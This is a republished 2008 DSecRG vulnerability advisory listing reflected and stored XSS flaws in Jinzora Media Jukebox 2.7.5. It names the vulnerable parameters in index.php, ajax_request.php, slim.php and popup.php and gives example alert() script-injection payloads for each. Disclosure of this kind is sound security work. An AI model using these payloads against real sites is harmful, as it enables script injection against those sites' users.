Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19212
HistoryFeb 20, 2008 - 12:00 a.m.

[email protected], [email protected], [email protected]

2008-02-2000:00:00
vulners.com
72
JSON

Digital Security Research Group [DSecRG] Advisory #DSECRG-08-016

Application: Jinzora Media Jukebox
Versions Affected: 2.7.5
Vendor URL: http://www.jinzora.com/
Bugs: Multiple XSS Injections
Exploits: YES
Reported: 04.02.2008
Second report: 12.02.2008
Vendor response: NONE
Date of Public Advisory: 19.02.2008
Authors: Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG] (research [at] dsec [dot]
ru)

Description

Jinzora system has multiple security vulnerabilities:

  1. Linked XSS
  2. Stored XSS

Details

  1. Multiple linked XSS vulnerabilities found. Attacker can inject XSS in URL string.

1.1 Linked XSS vulnerabiliies found in index.php.

GET parameters "frontend", "set_frontend", "jz_path", "theme", "set_theme".

Example:

http://[server]/[installdir]/index.php?frontend=<IMG SRC="javascript:alert('DSecRG XSS')">

1.2 Linked XSS vulnerabilities found in ajax_request.php.

GET parameters "frontend", "theme", "language".

Example:

http://[server]/[installdir]/ajax_request.php?language=<IMG SRC="javascript:alert('DSecRG XSS')">

1.3 Linked XSS vulnerability found in slim.php. GET parameter "jz_path".

Example:

http://[server]/[installdir]/slim.php?jz_path=<IMG SRC="javascript:alert('DSecRG XSS')">

1.4 Linked XSS vulnerabilities found in popup.php.

GET parameters "frontend", "theme", "jz_path".

Example:

http://[server]/[installdir]/popup.php?theme=<IMG SRC="javascript:alert('DSecRG XSS')">

1.5 Linked XSS in Path vulnerability found in index.php and slim.php.

Example:

http://[server]/[installdir]/index.php/"><script>alert('DSecRG XSS')</script>

  1. Stored XSS

2.1 Vulnerability found in script popup.php?ptype=sitenews in post parameter name "siteNewsData"

Example:

siteNewsData = </textarea><script>alert('DSecRG XSS')</script>

2.1 Vulnerability found in script popup.php?ptype=playlistedit in post parameter name "query"

Example:

query = <script>alert('DSecRG XSS')</script>

About

Digital Security is leading IT security company in Russia, providing information security
consulting, audit and penetration testing services, risk analysis and ISMS-related services and
certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses
on web application and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)

Digital Security Research Group mailto:[email protected]

JSON